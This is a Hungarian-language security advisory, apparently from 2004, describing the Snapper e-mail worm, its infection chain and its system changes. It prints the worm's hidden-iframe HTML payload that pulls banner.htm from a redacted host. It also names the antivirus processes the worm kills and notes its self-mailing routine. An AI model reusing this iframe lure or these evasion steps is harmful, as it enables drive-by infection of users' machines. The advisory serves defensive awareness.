Üres oldalnak látszó üzenet mögé bújik a ravasz Snapper féregvírus

A fertőzött e-mail jellemzői

Feladó: [hamis e-mailcím]
Tárgy: Re:
Tartalom: a következő HTML-kódot tartalmazza, mely a legtöbb e-mailkliensben egy üres oldalt jelenít meg:
[HTML][BODY][IFRAME src=´http://[törölve]/banner.htm´ style=´display:none´][/IFRAME][/HTML][/BODY]

A fenti révén letölti és megjeleníti a Banner.htm-et.

A féreg paraméterei

Felfedezésének ideje: 2004. március 24.
Utolsó frissítés ideje: 2004. március 24.
Veszélyeztetett rendszerek: Windows 9x/Me/NT/2k/XP
Nem érintett rendszerek: Windows 3.x, Microsoft IIS, Macintosh, UNIX, Linux, OS/2
Mérete: 9 Kbyte
Fertőzések száma: 0-49
Földrajzi elterjedtsége: alacsony
Károkozás mértéke: alacsony
Eltávolítása: nehéz

Aktiválódása esetén lezajló események

Tartalmaz egy ieload.dll állományt, mely vagy a Windows vagy a System könyvtárba kerül. Ez a következőket teszi:

– bemásolja magát a System könyvtárba ieload.dll néven
– önmagát Browser Helper Objectként regisztrálja; ez lehetővé teszi, hogy a féreg lefusson, amikor az Internet Explorer megnyitásra kerül
– a fenti elérése érdekében létrehozza a HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/Browser Helper Objects/[véletlenszerű clsid]HKEY_CLASSES_ROOT/CLSID/[véletlenszerű clsid] Registry kulcsot a rendszerleíró adatbázisban, ahol a [véletlenszerű clsid] értéke egy véletlenszerű érték, mely a következő formában jelenhet meg: {########-####-####-####-############}
– létrehozza a következő Registry bejegyzéseket, hogy eltárolja a konfigurációs információkat:
. HKEY_CURRENT_CONFIG/Software/Microsoft/Windows/CurrentVersion/Internet Settings/PopupsLoaded
. HKEY_CURRENT_CONFIG/Software/Microsoft/Windows/CurrentVersion/Internet Settings/TimerTicks
– leállítja a következő process-eket (ha azok futnak):
. NAVAPW32.EXE
. CCAPP.EXE
. OUTPOST.EXE
. SPIDERML.EXE
– rendszeres időközönként felveszi a kapcsolatot a 80-as TCP porton keresztül egy webszerverrel
– saját SMTP-motorja révén továbbítja magát a Windows Address Bookjában található összes kontakt számára

Banner.htm
A vírusinformáció készítésének időpontjában a Banner.htm weblap üresnek tűnik, de linkeket tartalmaz a féregre. Az oldal egyébként kihasználja az Internet Explorer Object Tag Vulnerability nevű sérülékenységet annak érdekében, hogy letöltsön egy ártó szándékú HTML-file-t, a Htmlhelp.cgi-t.

Htmlhelp.cgi
Ez egy olyan HTML-állomány, mely a féreg .dll file-ját kódolt formában tartalmazza; ez az állomány tartalmaz egy VBScriptet, mely a férget a ieload.dll néven a Windows könyvtárba telepíti.